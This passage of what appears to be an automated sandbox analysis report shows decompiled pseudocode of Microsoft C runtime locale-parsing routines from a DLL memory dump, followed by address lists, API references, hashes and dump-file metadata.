								_t257 = E6D4CDE92(_t362, _t425, _t431, _t447, _t447,  &_v276, 0x83,  &_v448, 0x55, 0);
								_t477 = _t475 + 0x18;
								__eflags = _t257;
								if(_t257 != 0) {
									_t373 = 0;
									__eflags = 0;
									_t76 = _t431 + 0x20; // 0x6d4cda3e
									_t426 = _t76;
									_t449 = 0;
									_v452 = _t426;
									do {
										__eflags = _t449;
										if(_t449 == 0) {
											L74:
											_t258 = _v456;
										} else {
											_t377 =  *_t426;
											_t259 =  &_v276;
											while(1) {
												__eflags =  *_t259 -  *_t377;
												_t431 = _v464;
												if( *_t259 !=  *_t377) {
													break;
												}
												__eflags =  *_t259;
												if( *_t259 == 0) {
													L67:
													_t373 = 0;
													_t260 = 0;
												} else {
													_t427 =  *((intOrPtr*)(_t259 + 2));
													__eflags = _t427 -  *((intOrPtr*)(_t377 + 2));
													_v458 = _t427;
													_t426 = _v452;
													if(_t427 !=  *((intOrPtr*)(_t377 + 2))) {
														break;
													} else {
														_t259 = _t259 + 4;
														_t377 = _t377 + 4;
														__eflags = _v458;
														if(_v458 != 0) {
															continue;
														} else {
															goto L67;
														}
													}
												}
												L69:
												__eflags = _t260;
												if(_t260 == 0) {
													_t362 = _t362 + 1;
													__eflags = _t362;
													goto L74;
												} else {
													_t261 =  &_v276;
													_push(_t261);
													_push(_t449);
													_push(_t431);
													L84();
													_t426 = _v452;
													_t477 = _t477 + 0xc;
													__eflags = _t261;
													if(_t261 == 0) {
														_t373 = 0;
														_t258 = 0;
														_v456 = 0;
													} else {
														_t362 = _t362 + 1;
														_t373 = 0;
														goto L74;
													}
												}
												goto L75;
											}
											asm("sbb eax, eax");
											_t260 = _t259 | 0x00000001;
											_t373 = 0;
											__eflags = 0;
											goto L69;
										}
										L75:
										_t449 = _t449 + 1;
										_t426 = _t426 + 0x10;
										_v452 = _t426;
										__eflags = _t449 - 5;
									} while (_t449 <= 5);
									__eflags = _t258;
									if(__eflags != 0) {
										goto L80;
									} else {
										__eflags = _t362;
										goto L78;
									}
								}
								goto L81;
							} else {
								__eflags =  *(_t447 + 2) - 0x43;
								if( *(_t447 + 2) != 0x43) {
									goto L59;
								} else {
									__eflags =  *((short*)(_t447 + 4)) - 0x5f;
									if( *((short*)(_t447 + 4)) != 0x5f) {
										goto L59;
									} else {
										while(1) {
											_t263 = E6D4DD60D(_t447, 0x6d4f0f28);
											_t364 = _t263;
											_v472 = _t364;
											_pop(_t379);
											__eflags = _t364;
											if(_t364 == 0) {
												break;
											}
											_t265 = _t263 - _t447;
											__eflags = _t265;
											_v456 = _t265 >> 1;
											if(_t265 == 0) {
												break;
											} else {
												_t267 = 0x3b;
												__eflags =  *_t364 - _t267;
												if( *_t364 == _t267) {
													break;
												} else {
													_t434 = _v456;
													_t365 = 0x6d4f0dec;
													_v460 = 1;
													do {
														_t268 = E6D4CABBA( *_t365, _t447, _t434);
														_t475 = _t475 + 0xc;
														__eflags = _t268;
														if(_t268 != 0) {
															goto L46;
														} else {
															_t380 =  *_t365;
															_t425 = _t380 + 2;
															do {
																_t337 =  *_t380;
																_t380 = _t380 + 2;
																__eflags = _t337 - _v468;
															} while (_t337 != _v468);
															_t379 = _t380 - _t425 >> 1;
															__eflags = _t434 - _t380 - _t425 >> 1;
															if(_t434 != _t380 - _t425 >> 1) {
																goto L46;
															}
														}
														break;
														L46:
														_v460 = _v460 + 1;
														_t365 = _t365 + 0xc;
														__eflags = _t365 - 0x6d4f0e1c;
													} while (_t365 <= 0x6d4f0e1c);
													_t362 = _v472 + 2;
													_t269 = E6D4DD5BD(_t379, _t362, 0x6d4f0f30);
													_t431 = _v464;
													_t450 = _t269;
													_pop(_t383);
													__eflags = _t450;
													if(_t450 != 0) {
														L49:
														__eflags = _v460 - 5;
														if(_v460 > 5) {
															_t270 = _v452;
															goto L55;
														} else {
															_push(_t450);
															_t272 = E6D4DD5B2(_t383,  &_v276, 0x83, _t362);
															_t478 = _t475 + 0x10;
															__eflags = _t272;
															if(_t272 != 0) {
																L83:
																_push(0);
																_push(0);
																_push(0);
																_push(0);
																_push(0);
																E6D4C2188();
																asm("int3");
																_push(_t466);
																_t468 = _t478;
																_t275 =  *0x6d54506c; // 0x9d44929c
																_v556 = _t275 ^ _t468;
																_push(_t362);
																_t367 = _v540;
																_push(_t450);
																_push(_t431);
																_t435 = _v544;
																_v1292 = _t367;
																_v1276 = E6D4CD5FF(_t367, _t383, _t425) + 0x278;
																_t282 = E6D4CDE92(_t367, _t425, _t435, _v536, _v536,  &_v820, 0x83,  &_v1248, 0x55,  &_v1256);
																_t480 = _t478 - 0x2e4 + 0x18;
																__eflags = _t282;
																if(_t282 != 0) {
																	_t101 = _t367 + 2; // 0x6
																	_t453 = _t101 << 4;
																	__eflags = _t453;
																	_t283 =  &_v280;
																	_v724 = _t453;
																	_t428 =  *(_t453 + _t435);
																	_t384 =  *(_t453 + _t435);
																	while(1) {
																		_v712 = _v712 & 0x00000000;
																		__eflags =  *_t283 -  *_t384;
																		_t455 = _v724;
																		if( *_t283 !=  *_t384) {
																			break;
																		}
																		__eflags =  *_t283;
																		if( *_t283 == 0) {
																			L93:
																			_t284 = _v712;
																		} else {
																			_t462 =  *((intOrPtr*)(_t283 + 2));
																			__eflags = _t462 -  *((intOrPtr*)(_t384 + 2));
																			_v718 = _t462;
																			_t455 = _v724;
																			if(_t462 !=  *((intOrPtr*)(_t384 + 2))) {
																				break;
																			} else {
																				_t283 = _t283 + 4;
																				_t384 = _t384 + 4;
																				__eflags = _v718;
																				if(_v718 != 0) {
																					continue;
																				} else {
																					goto L93;
																				}
																			}
																		}
																		L95:
																		__eflags = _t284;
																		if(_t284 != 0) {
																			_t385 =  &_v280;
																			_t428 = _t385 + 2;
																			do {
																				_t285 =  *_t385;
																				_t385 = _t385 + 2;
																				__eflags = _t285 - _v712;
																			} while (_t285 != _v712);
																			_v728 = (_t385 - _t428 >> 1) + 1;
																			_t288 = E6D4CF26D(_t385 - _t428 >> 1, 4 + ((_t385 - _t428 >> 1) + 1) * 2);
																			_v740 = _t288;
																			__eflags = _t288;
																			if(_t288 == 0) {
																				goto L86;
																			} else {
																				_v732 =  *((intOrPtr*)(_t455 + _t435));
																				_t125 = _t367 * 4; // 0xe764e850
																				_v744 =  *((intOrPtr*)(_t435 + _t125 + 0xa0));
																				_t128 = _t435 + 8; // 0x8b018b
																				_v748 =  *_t128;
																				_t394 =  &_v280;
																				_v720 = _t288 + 4;
																				_t292 = E6D4C91A7(_t288 + 4, _v728,  &_v280);
																				_t482 = _t480 + 0xc;
																				__eflags = _t292;
																				if(_t292 != 0) {
																					_t293 = _v712;
																					_push(_t293);
																					_push(_t293);
																					_push(_t293);
																					_push(_t293);
																					_push(_t293);
																					E6D4C2188();
																					asm("int3");
																					_t295 =  *0x6d5476f0; // 0x15b6430
																					 *0x6d545108 =  *((intOrPtr*)(_t295 + 0x88));
																					 *0x6d5451c0 =  *_t295;
																					_t296 =  *((intOrPtr*)(_t295 + 4));
																					 *0x6d5451ec = _t296;
																					return _t296;
																				} else {
																					__eflags = _v280 - 0x43;
																					 *((intOrPtr*)(_t455 + _t435)) = _v720;
																					if(_v280 != 0x43) {
																						L104:
																						_t299 = E6D4CDB3B(_t367, _t394, _t435,  &_v708);
																						_t398 = _v712;
																						 *(_t435 + 0xa0 + _t367 * 4) = _t299;
																					} else {
																						__eflags = _v278;
																						if(_v278 != 0) {
																							goto L104;
																						} else {
																							_t398 = _v712;
																							 *(_t435 + 0xa0 + _t367 * 4) = _t398;
																						}
																					}
																					__eflags = _t367 - 2;
																					if(_t367 != 2) {
																						__eflags = _t367 - 1;
																						if(_t367 != 1) {
																							__eflags = _t367 - 5;
																							if(_t367 == 5) {
																								 *((intOrPtr*)(_t435 + 0x14)) = _v716;
																							}
																						} else {
																							 *((intOrPtr*)(_t435 + 0x10)) = _v716;
																						}
																					} else {
																						_t460 = _v736;
																						_t428 = _t398;
																						_t408 = _t460;
																						 *(_t435 + 8) = _v716;
																						_v720 = _t460;
																						_v728 = _t460[8];
																						_v716 = _t460[9];
																						while(1) {
																							_t154 = _t435 + 8; // 0x8b018b
																							__eflags =  *_t154 -  *_t408;
																							if( *_t154 ==  *_t408) {
																								break;
																							}
																							_t461 = _v720;
																							_t428 = _t428 + 1;
																							_t331 =  *_t408;
																							 *_t461 = _v728;
																							_v716 = _t408[1];
																							_t408 = _t461 + 8;
																							 *((intOrPtr*)(_t461 + 4)) = _v716;
																							_t367 = _v752;
																							_t460 = _v736;
																							_v728 = _t331;
																							_v720 = _t408;
																							__eflags = _t428 - 5;
																							if(_t428 < 5) {
																								continue;
																							} else {
																							}
																							L112:
																							__eflags = _t428 - 5;
																							if(__eflags == 0) {
																								_t178 = _t435 + 8; // 0x8b018b
																								_t322 = E6D4D6102(_t367, _t428, _t435, __eflags, _v712, 1, 0x6d4f0ea8, 0x7f,  &_v536,  *_t178, 1);
																								_t482 = _t482 + 0x1c;
																								__eflags = _t322;
																								_t323 = _v712;
																								if(_t322 == 0) {
																									_t460[1] = _t323;
																								} else {
																									do {
																										 *(_t468 + _t323 * 2 - 0x20c) =  *(_t468 + _t323 * 2 - 0x20c) & 0x000001ff;
																										_t323 = _t323 + 1;
																										__eflags = _t323 - 0x7f;
																									} while (_t323 < 0x7f);
																									_t326 = E6D4A1C3C( &_v536,  *0x6d5451e8, 0xfe);
																									_t482 = _t482 + 0xc;
																									__eflags = _t326;
																									_t460[1] = 0 | _t326 == 0x00000000;
																								}
																								_t193 = _t435 + 8; // 0x8b018b
																								 *_t460 =  *_t193;
																							}
																							 *(_t435 + 0x18) = _t460[1];
																							goto L123;
																						}
																						__eflags = _t428;
																						if(_t428 != 0) {
																							 *_t460 =  *(_t460 + _t428 * 8);
																							_t460[1] =  *(_t460 + 4 + _t428 * 8);
																							 *(_t460 + _t428 * 8) = _v728;
																							 *(_t460 + 4 + _t428 * 8) = _v716;
																						}
																						goto L112;
																					}
																					L123:
																					_t300 = _t367 * 0xc;
																					_t200 = _t300 + 0x6d4f0de8; // 0x6d48815c
																					 *0x6d4ea26c(_t435);
																					_t302 =  *((intOrPtr*)( *_t200))();
																					_t401 = _v732;
																					__eflags = _t302;
																					if(_t302 == 0) {
																						__eflags = _t401 - 0x6d5452b0;
																						if(_t401 != 0x6d5452b0) {
																							_t459 = _t367 + _t367;
																							__eflags = _t459;
																							asm("lock xadd [eax], ecx");
																							if(_t459 != 0) {
																								goto L128;
																							} else {
																								_t218 = _t459 * 8; // 0x10468b00
																								E6D4CCBD3( *((intOrPtr*)(_t435 + _t218 + 0x28)));
																								_t221 = _t459 * 8; // 0x3b8e8
																								E6D4CCBD3( *((intOrPtr*)(_t435 + _t221 + 0x24)));
																								_t224 = _t367 * 4; // 0xe764e850
																								E6D4CCBD3( *((intOrPtr*)(_t435 + _t224 + 0xa0)));
																								_t404 = _v712;
																								 *((intOrPtr*)(_v724 + _t435)) = _t404;
																								 *(_t435 + 0xa0 + _t367 * 4) = _t404;
																							}
																						}
																						_t402 = _v740;
																						 *_t402 = 1;
																						 *((intOrPtr*)(_t435 + 0x28 + (_t367 + _t367) * 8)) = _t402;
																					} else {
																						 *(_v724 + _t435) = _t401;
																						_t205 = _t367 * 4; // 0xe764e850
																						E6D4CCBD3( *((intOrPtr*)(_t435 + _t205 + 0xa0)));
																						 *(_t435 + 0xa0 + _t367 * 4) = _v744;
																						E6D4CCBD3(_v740);
																						 *(_t435 + 8) = _v748;
																						goto L86;
																					}
																					goto L87;
																				}
																			}
																		} else {
																			goto L87;
																		}
																		goto L131;
																	}
																	asm("sbb eax, eax");
																	_t284 = _t283 | 0x00000001;
																	__eflags = _t284;
																	goto L95;
																} else {
																	L86:
																	__eflags = 0;
																	L87:
																	_pop(_t456);
																	__eflags = _v16 ^ _t468;
																	return E6D49F8A5(_v16 ^ _t468, _t428, _t456);
																}
															} else {
																_t333 = _t450 + _t450;
																__eflags = _t333 - 0x106;
																if(_t333 >= 0x106) {
																	E6D4A03A9();
																	goto L83;
																} else {
																	 *((short*)(_t466 + _t333 - 0x10c)) = 0;
																	_t335 =  &_v276;
																	_push(_t335);
																	_push(_v460);
																	_push(_t431);
																	L84();
																	_t475 = _t478 + 0xc;
																	__eflags = _t335;
																	_t270 = _v452;
																	if(_t335 != 0) {
																		_t270 = _t270 + 1;
																		_v452 = _t270;
																	}
																	L55:
																	_t447 = _t362 + _t450 * 2;
																	_t373 = 0;
																	__eflags =  *_t447;
																	if( *_t447 == 0) {
																		L57:
																		__eflags = _t270;
																		L78:
																		if(__eflags != 0) {
																			goto L80;
																		} else {
																		}
																		goto L81;
																	} else {
																		_t447 = _t447 + 2;
																		__eflags =  *_t447;
																		if( *_t447 != 0) {
																			continue;
																		} else {
																			goto L57;
																		}
																	}
																}
															}
														}
													} else {
														_t336 = 0x3b;
														__eflags =  *_t362 - _t336;
														if( *_t362 != _t336) {
															break;
														} else {
															goto L49;
														}
													}
												}
											}
											goto L131;
										}
										goto L81;
									}
								}
							}
						}
					} else {
						__eflags = _t447;
						if(_t447 != 0) {
							_push(_t447);
							_push(_t251);
							_push(_t431);
							L84();
						}
						L81:
						_pop(_t448);
						__eflags = _v12 ^ _t466;
						return E6D49F8A5(_v12 ^ _t466, _t425, _t448);
					}
				}
				L131:
			}

0x6d4ce506
0x6d4ce509
0x6d4ce50b
0x6d4ce50e
0x6d4ce50f
0x6d4ce518
0x6d4ce51b
0x6d4ce520
0x6d4ce522
0x6d4ce524
0x6d4ce527
0x6d4ce640
0x6d4ce645
0x6d4ce52d
0x6d4ce52d
0x6d4ce52e
0x6d4ce52e
0x6d4ce531
0x6d4ce534
0x6d4ce536
0x6d4ce539
0x6d4ce539
0x6d4ce53c
0x6d4ce53e
0x6d4ce541
0x6d4ce546
0x6d4ce554
0x6d4ce55e
0x6d4ce561
0x6d4ce564
0x6d4ce564
0x6d4ce56f
0x6d4ce574
0x6d4ce579
0x00000000
0x6d4ce57f
0x6d4ce582
0x6d4ce582
0x6d4ce585
0x6d4ce587
0x6d4ce58a
0x6d4ce58a
0x6d4ce58a
0x6d4ce58c
0x6d4ce58c
0x6d4ce58c
0x6d4ce592
0x00000000
0x00000000
0x6d4ce597
0x6d4ce5ae
0x6d4ce5ae
0x6d4ce599
0x6d4ce599
0x6d4ce5a1
0x00000000
0x6d4ce5a3
0x6d4ce5a3
0x6d4ce5a6
0x6d4ce5ac
0x00000000
0x00000000
0x00000000
0x00000000
0x6d4ce5ac
0x6d4ce5a1
0x6d4ce5b7
0x6d4ce5bc
0x6d4ce5be
0x6d4ce5c3
0x6d4ce5c6
0x6d4ce5c9
0x6d4ce5cc
0x6d4ce5cf
0x6d4ce5d1
0x6d4ce5d6
0x6d4ce5e0
0x6d4ce5e8
0x6d4ce5f0
0x00000000
0x6d4ce5f6
0x6d4ce5fa
0x6d4ce647
0x6d4ce64d
0x6d4ce650
0x6d4ce653
0x6d4ce655
0x6d4ce659
0x6d4ce65d
0x6d4ce65f
0x6d4ce662
0x6d4ce667
0x6d4ce65d
0x6d4ce668
0x6d4ce66b
0x6d4ce66d
0x6d4ce66f
0x6d4ce673
0x6d4ce674
0x6d4ce676
0x6d4ce679
0x6d4ce67e
0x6d4ce674
0x6d4ce681
0x6d4ce684
0x6d4ce687
0x6d4ce68a
0x6d4ce68d
0x6d4ce68d
0x6d4ce5fc
0x6d4ce5fc
0x6d4ce5ff
0x6d4ce602
0x6d4ce604
0x6d4ce608
0x6d4ce60c
0x6d4ce60e
0x6d4ce611
0x6d4ce616
0x6d4ce60c
0x6d4ce617
0x6d4ce61c
0x6d4ce61e
0x6d4ce623
0x6d4ce625
0x6d4ce628
0x6d4ce62d
0x6d4ce623
0x6d4ce62e
0x6d4ce632
0x6d4ce632
0x6d4ce635
0x6d4ce639
0x6d4ce63c
0x6d4ce63c
0x00000000
0x6d4ce63f
0x00000000
0x6d4ce5f0
0x6d4ce5b2
0x6d4ce5b4
0x6d4ce5b4
0x00000000
0x6d4ce5b4
0x6d4ce694
0x6d4ce695
0x6d4ce696
0x6d4ce697
0x6d4ce698
0x6d4ce699
0x6d4ce69e
0x6d4ce6a1
0x6d4ce6a2
0x6d4ce6a4
0x6d4ce6aa
0x6d4ce6b1
0x6d4ce6b4
0x6d4ce6b7
0x6d4ce6b8
0x6d4ce6b9
0x6d4ce6bc
0x6d4ce6bd
0x6d4ce6c0
0x6d4ce6c6
0x6d4ce6c8
0x6d4ce6ed
0x6d4ce6f7
0x6d4ce6fd
0x6d4ce6ff
0x6d4ce705
0x6d4ce707
0x6d4ce95a
0x6d4ce95b
0x00000000
0x6d4ce70d
0x6d4ce70d
0x6d4ce711
0x6d4ce878
0x6d4ce88f
0x6d4ce894
0x6d4ce897
0x6d4ce899
0x6d4ce89f
0x6d4ce89f
0x6d4ce8a1
0x6d4ce8a1
0x6d4ce8a4
0x6d4ce8a6
0x6d4ce8ac
0x6d4ce8ac
0x6d4ce8ae
0x6d4ce935
0x6d4ce935
0x6d4ce8b4
0x6d4ce8b4
0x6d4ce8b6
0x6d4ce8bc
0x6d4ce8bf
0x6d4ce8c2
0x6d4ce8c8
0x00000000
0x00000000
0x6d4ce8ca
0x6d4ce8ce
0x6d4ce8f7
0x6d4ce8f7
0x6d4ce8f9
0x6d4ce8d0
0x6d4ce8d0
0x6d4ce8d4
0x6d4ce8d8
0x6d4ce8df
0x6d4ce8e5
0x00000000
0x6d4ce8e7
0x6d4ce8e7
0x6d4ce8ea
0x6d4ce8ed
0x6d4ce8f5
0x00000000
0x00000000
0x00000000
0x00000000
0x6d4ce8f5
0x6d4ce8e5
0x6d4ce904
0x6d4ce904
0x6d4ce906
0x6d4ce934
0x6d4ce934
0x00000000
0x6d4ce908
0x6d4ce908
0x6d4ce90e
0x6d4ce90f
0x6d4ce910
0x6d4ce911
0x6d4ce916
0x6d4ce91c
0x6d4ce91f
0x6d4ce921
0x6d4ce928
0x6d4ce92a
0x6d4ce92c
0x6d4ce923
0x6d4ce923
0x6d4ce924
0x00000000
0x6d4ce924
0x6d4ce921
0x00000000
0x6d4ce906
0x6d4ce8fd
0x6d4ce8ff
0x6d4ce902
0x6d4ce902
0x00000000
0x6d4ce902
0x6d4ce93b
0x6d4ce93b
0x6d4ce93c
0x6d4ce93f
0x6d4ce945
0x6d4ce945
0x6d4ce94e
0x6d4ce950
0x00000000
0x6d4ce952
0x6d4ce952
0x00000000
0x6d4ce952
0x6d4ce950
0x00000000
0x6d4ce717
0x6d4ce717
0x6d4ce71c
0x00000000
0x6d4ce722
0x6d4ce722
0x6d4ce727
0x00000000
0x6d4ce72d
0x6d4ce72d
0x6d4ce733
0x6d4ce738
0x6d4ce73a
0x6d4ce741
0x6d4ce742
0x6d4ce744
0x00000000
0x00000000
0x6d4ce74a
0x6d4ce74a
0x6d4ce74e
0x6d4ce754
0x00000000
0x6d4ce75a
0x6d4ce75c
0x6d4ce75d
0x6d4ce760
0x00000000
0x6d4ce766
0x6d4ce766
0x6d4ce76c
0x6d4ce771
0x6d4ce77b
0x6d4ce77f
0x6d4ce784
0x6d4ce787
0x6d4ce789
0x00000000
0x6d4ce78b
0x6d4ce78b
0x6d4ce78d
0x6d4ce790
0x6d4ce790
0x6d4ce793
0x6d4ce796
0x6d4ce796
0x6d4ce7a1
0x6d4ce7a3
0x6d4ce7a5
0x00000000
0x00000000
0x6d4ce7a5
0x00000000
0x6d4ce7a7
0x6d4ce7a7
0x6d4ce7ad
0x6d4ce7b0
0x6d4ce7b0
0x6d4ce7be
0x6d4ce7c7
0x6d4ce7cc
0x6d4ce7d2
0x6d4ce7d5
0x6d4ce7d6
0x6d4ce7d8
0x6d4ce7e6
0x6d4ce7e6
0x6d4ce7ed
0x6d4ce84e
0x00000000
0x6d4ce7ef
0x6d4ce7ef
0x6d4ce7fd
0x6d4ce802
0x6d4ce805
0x6d4ce807
0x6d4ce977
0x6d4ce979
0x6d4ce97a
0x6d4ce97b
0x6d4ce97c
0x6d4ce97d
0x6d4ce97e
0x6d4ce983
0x6d4ce986
0x6d4ce987
0x6d4ce98f
0x6d4ce996
0x6d4ce999
0x6d4ce99a
0x6d4ce99d
0x6d4ce9a1
0x6d4ce9a2
0x6d4ce9a5
0x6d4ce9b5
0x6d4ce9d8
0x6d4ce9dd
0x6d4ce9e0
0x6d4ce9e2
0x6d4ce9f7
0x6d4ce9fa
0x6d4ce9fa
0x6d4ce9fd
0x6d4cea03
0x6d4cea09
0x6d4cea0c
0x6d4cea0e
0x6d4cea11
0x6d4cea18
0x6d4cea1b
0x6d4cea21
0x00000000
0x00000000
0x6d4cea23
0x6d4cea27
0x6d4cea50
0x6d4cea50
0x6d4cea29
0x6d4cea29
0x6d4cea2d
0x6d4cea31
0x6d4cea38
0x6d4cea3e
0x00000000
0x6d4cea40
0x6d4cea40
0x6d4cea43
0x6d4cea46
0x6d4cea4e
0x00000000
0x00000000
0x00000000
0x00000000
0x6d4cea4e
0x6d4cea3e
0x6d4cea5d
0x6d4cea5d
0x6d4cea5f
0x6d4cea65
0x6d4cea6b
0x6d4cea6e
0x6d4cea6e
0x6d4cea71
0x6d4cea74
0x6d4cea74
0x6d4cea84
0x6d4cea92
0x6d4cea97
0x6d4cea9e
0x6d4ceaa0
0x00000000
0x6d4ceaa6
0x6d4ceaac
0x6d4ceab2
0x6d4ceab9
0x6d4ceabf
0x6d4ceac2
0x6d4ceac8
0x6d4cead5
0x6d4ceadc
0x6d4ceae1
0x6d4ceae4
0x6d4ceae6
0x6d4ced3f
0x6d4ced45
0x6d4ced46
0x6d4ced47
0x6d4ced48
0x6d4ced49
0x6d4ced4a
0x6d4ced4f
0x6d4ced50
0x6d4ced5b
0x6d4ced63
0x6d4ced69
0x6d4ced6c
0x6d4ced71
0x6d4ceaec
0x6d4ceaec
0x6d4ceafa
0x6d4ceafd
0x6d4ceb18
0x6d4ceb1f
0x6d4ceb25
0x6d4ceb2b
0x6d4ceaff
0x6d4ceaff
0x6d4ceb07
0x00000000
0x6d4ceb09
0x6d4ceb09
0x6d4ceb0f
0x6d4ceb0f
0x6d4ceb07
0x6d4ceb32
0x6d4ceb35
0x6d4cec52
0x6d4cec55
0x6d4cec62
0x6d4cec65
0x6d4cec6d
0x6d4cec6d
0x6d4cec57
0x6d4cec5d
0x6d4cec5d
0x6d4ceb3b
0x6d4ceb3b
0x6d4ceb41
0x6d4ceb49
0x6d4ceb4b
0x6d4ceb4e
0x6d4ceb57
0x6d4ceb60
0x6d4ceb66
0x6d4ceb66
0x6d4ceb69
0x6d4ceb6b
0x00000000
0x00000000
0x6d4ceb6d
0x6d4ceb73
0x6d4ceb74
0x6d4ceb7f
0x6d4ceb87
0x6d4ceb8f
0x6d4ceb92
0x6d4ceb95
0x6d4ceb9b
0x6d4ceba1
0x6d4ceba7
0x6d4cebad
0x6d4cebb0
0x00000000
0x00000000
0x6d4cebb2
0x6d4cebd7
0x6d4cebd7
0x6d4cebda
0x6d4cebde
0x6d4cebf7
0x6d4cebfc
0x6d4cebff
0x6d4cec01
0x6d4cec07
0x6d4cec42
0x6d4cec09
0x6d4cec09
0x6d4cec0e
0x6d4cec16
0x6d4cec17
0x6d4cec17
0x6d4cec2e
0x6d4cec35
0x6d4cec38
0x6d4cec3d
0x6d4cec3d
0x6d4cec45
0x6d4cec48
0x6d4cec48
0x6d4cec4d
0x00000000
0x6d4cec4d
0x6d4cebb4
0x6d4cebb6
0x6d4cebbb
0x6d4cebc1
0x6d4cebca
0x6d4cebd3
0x6d4cebd3
0x00000000
0x6d4cebb6
0x6d4cec70
0x6d4cec70
0x6d4cec74
0x6d4cec7c
0x6d4cec82
0x6d4cec85
0x6d4cec8b
0x6d4cec8d
0x6d4ceccd
0x6d4cecd3
0x6d4cecda
0x6d4cecda
0x6d4cece0
0x6d4cece4
0x00000000
0x6d4cece6
0x6d4cece6
0x6d4cecea
0x6d4cecef
0x6d4cecf3
0x6d4cecf8
0x6d4cecff
0x6d4ced0d
0x6d4ced13
0x6d4ced16
0x6d4ced16
0x6d4cece4
0x6d4ced25
0x6d4ced2d
0x6d4ced36
0x6d4cec8f
0x6d4cec95
0x6d4cec98
0x6d4cec9f
0x6d4cecb1
0x6d4cecb8
0x6d4cecc5
0x00000000
0x6d4cecc5
0x00000000
0x6d4cec8d
0x6d4ceae6
0x6d4cea61
0x00000000
0x6d4cea61
0x00000000
0x6d4cea5f
0x6d4cea58
0x6d4cea5a
0x6d4cea5a
0x00000000
0x6d4ce9e4
0x6d4ce9e4
0x6d4ce9e4
0x6d4ce9e6
0x6d4ce9ea
0x6d4ce9eb
0x6d4ce9f6
0x6d4ce9f6
0x6d4ce80d
0x6d4ce80d
0x6d4ce810
0x6d4ce815
0x6d4ce972
0x00000000
0x6d4ce81b
0x6d4ce81d
0x6d4ce825
0x6d4ce82b
0x6d4ce82c
0x6d4ce832
0x6d4ce833
0x6d4ce838
0x6d4ce83b
0x6d4ce83d
0x6d4ce843
0x6d4ce845
0x6d4ce846
0x6d4ce846
0x6d4ce854
0x6d4ce854
0x6d4ce857
0x6d4ce859
0x6d4ce85c
0x6d4ce86a
0x6d4ce86a
0x6d4ce954
0x6d4ce954
0x00000000
0x6d4ce956
0x6d4ce956
0x00000000
0x6d4ce85e
0x6d4ce85e
0x6d4ce861
0x6d4ce864
0x00000000
0x00000000
0x00000000
0x00000000
0x6d4ce864
0x6d4ce85c
0x6d4ce815
0x6d4ce807
0x6d4ce7da
0x6d4ce7dc
0x6d4ce7dd
0x6d4ce7e0
0x00000000
0x00000000
0x00000000
0x00000000
0x6d4ce7e0
0x6d4ce7d8
0x6d4ce760
0x00000000
0x6d4ce754
0x00000000
0x6d4ce871
0x6d4ce727
0x6d4ce71c
0x6d4ce711
0x6d4ce6ca
0x6d4ce6ca
0x6d4ce6cc
0x6d4ce6ce
0x6d4ce6cf
0x6d4ce6d0
0x6d4ce6d1
0x6d4ce6d6
0x6d4ce961
0x6d4ce965
0x6d4ce966
0x6d4ce971
0x6d4ce971
0x6d4ce6c8
0x00000000

APIs

Part of subcall function 6D4CF26D: RtlAllocateHeap.NTDLL(00000000,6D4875D9,00000000,?,6D4A0F8B,00000002,00000000,?,?,?,6D461298,6D4875D9,00000004,00000000,00000000,00000000), ref: 6D4CF29F

_free.LIBCMT ref: 6D4CE611
_free.LIBCMT ref: 6D4CE628
_free.LIBCMT ref: 6D4CE647
_free.LIBCMT ref: 6D4CE662
_free.LIBCMT ref: 6D4CE679

Strings

Om, xrefs: 6D4CE559

Memory Dump Source

Source File: 00000000.00000002.917299629.000000006D461000.00000020.00020000.sdmp, Offset: 6D460000, based on PE: true

Associated: 00000000.00000002.917294141.000000006D460000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.917348475.000000006D4EA000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.925206892.000000006D545000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.927426246.000000006D55C000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.928422377.000000006D55D000.00000002.00020000.sdmp Download File

Yara matches

Similarity

API ID: _free$AllocateHeap
String ID: Om
API String ID: 3033488037-1734728714
Opcode ID: 9249de472570f1a36a3775d10be7bd3d845b25b3b5a0a052edc4719d40107339
Instruction ID: 598d6be93065730bfe19535e3cd551f4539f1ce0e398996eff9523741bf1c282
Opcode Fuzzy Hash: 9249de472570f1a36a3775d10be7bd3d845b25b3b5a0a052edc4719d40107339
Instruction Fuzzy Hash: 3A51AC3AA14205ABDB11CF69C882F6AB7F5EF49724F54056DE909DB250E731EE01CB82

Uniqueness

Uniqueness Score: -1.00%

Function 6D4C23DD, Relevance: 9.2, APIs: 6, Instructions: 200COMMON

Download Yara Rule

APIs

__cftoe.LIBCMT ref: 6D4C2409
__cftoe.LIBCMT ref: 6D4C243B

Memory Dump Source

Source File: 00000000.00000002.917299629.000000006D461000.00000020.00020000.sdmp, Offset: 6D460000, based on PE: true

Associated: 00000000.00000002.917294141.000000006D460000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.917348475.000000006D4EA000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.925206892.000000006D545000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.927426246.000000006D55C000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.928422377.000000006D55D000.00000002.00020000.sdmp Download File

Yara matches

Similarity

API ID: __cftoe
String ID:
API String ID: 4189289331-0
Opcode ID: 1cf7684782a43339531a548eb387f1d2fc72d2b58458ccba4c1aca8ab7e06852
Instruction ID: b08638d4b50ffa15c07c73a2851cb4fd18f26176eb6522c9bf81434c234a5827
Opcode Fuzzy Hash: 1cf7684782a43339531a548eb387f1d2fc72d2b58458ccba4c1aca8ab7e06852
Instruction Fuzzy Hash: FF51FE3A904206ABDB35DB688CC0F7E77B9EF49328F21511DE524E6281DF71DD0086A6

Uniqueness

Uniqueness Score: -1.00%

Function 6D4618A0, Relevance: 6.0, APIs: 4, Instructions: 31COMMON

Download Yara Rule

APIs

__EH_prolog3.LIBCMT ref: 6D4618A7
std::_Locinfo::_Locinfo.LIBCPMT ref: 6D4618D5

Part of subcall function 6D461450: __EH_prolog3.LIBCMT ref: 6D461457
Part of subcall function 6D461450: std::_Lockit::_Lockit.LIBCPMT ref: 6D461464
Part of subcall function 6D461450: std::_Locinfo::_Locinfo_ctor.LIBCPMT ref: 6D4614A1

ctype.LIBCPMT ref: 6D4618E7

Part of subcall function 6D461928: __Getctype.LIBCPMT ref: 6D461937
Part of subcall function 6D461928: __Getcvt.LIBCPMT ref: 6D461949

std::_Locinfo::~_Locinfo.LIBCPMT ref: 6D4618F1

Part of subcall function 6D4614CE: std::_Locinfo::_Locinfo_dtor.LIBCPMT ref: 6D4614F5
